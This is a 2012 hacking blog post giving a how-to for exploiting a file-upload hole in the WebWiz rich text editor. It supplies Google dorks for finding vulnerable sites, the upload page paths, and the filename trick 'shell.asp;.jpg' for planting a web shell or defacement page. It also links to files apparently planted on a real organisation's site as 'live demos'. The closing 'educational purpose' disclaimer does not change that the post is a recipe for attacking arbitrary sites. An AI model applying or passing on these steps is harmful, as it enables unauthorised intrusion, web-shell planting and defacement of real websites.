Sunday, April 8, 2012
Website hackz RTE webwiz vulnerability | file upload exploit
Do you like this story?
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsl3yz3ISUSSknrD2N1N3PPiKbN57tv3LFvWCGsv2nYUn61SG6CHqgWcJiIOUnzzIfJsxquZ0QZ0ZHwffR60Pf2EFgRgq-W5k3xP9GKz3GBWvzbdmVK7ebEBENFlMlkw3xb6oCYPMZ8Y/s320/website.jpg)
RTE exploit: file upload vulnerability of Webwiz websites
Webwiz rich text editor HTML code is carried in the
open after they are sent charCode due functioning of the page
Google Dorks:
[1].inurl:rte/my_documents/my_files
[2].inurl:/my_documents/my_files/
search these dorks on google choose any website.
Exploit:
[1].website.com/rte/RTE_popup_file_atch.asp
[2].website.com/admin/RTE_popup_file_atch.asp
Site: http://www.example.com
http://www.example.com/RTE_popup_file_atch.asp
now you will receive a uploading option
you can also upload a shell or directly your deface
page shell format:- shell.asp;.jpg
live demo:
[1]http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/ZFZ_!nD!_C0d3_Br3ak3.html
[2] http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/4FB_cyb3r_shr3y@sh.jpg
Blog Warning:
HEY VISITORS THIS IS A NOTE FROM ADMIN:
THIS WEBSITE IS BUILD BY ME ONLY FOR EDUCATIONAL PURPOSE I JUST WANT TO PROVIDE CYBER TIPS SO IF U USE THESE INFORMATION TO HARM ANY SUBSTANCE,COMMUNITY OR PERSON AND GOT CAUGHT THEN I AM NOT RESPONSIBLE FOR IT SO MIND MY WORDS HACKING IS A CYBER CRIME DON'T CHEAT OTHERS WITH YOUR POWERS
KNOWLEDGE IS FOR SHARING ASK-SHARE
THIS WEBSITE IS BUILD BY ME ONLY FOR EDUCATIONAL PURPOSE I JUST WANT TO PROVIDE CYBER TIPS SO IF U USE THESE INFORMATION TO HARM ANY SUBSTANCE,COMMUNITY OR PERSON AND GOT CAUGHT THEN I AM NOT RESPONSIBLE FOR IT SO MIND MY WORDS HACKING IS A CYBER CRIME DON'T CHEAT OTHERS WITH YOUR POWERS
KNOWLEDGE IS FOR SHARING ASK-SHARE
FOR MORE INFORMATION MAIL ME:
STSHREYASH50@GMAIL.COM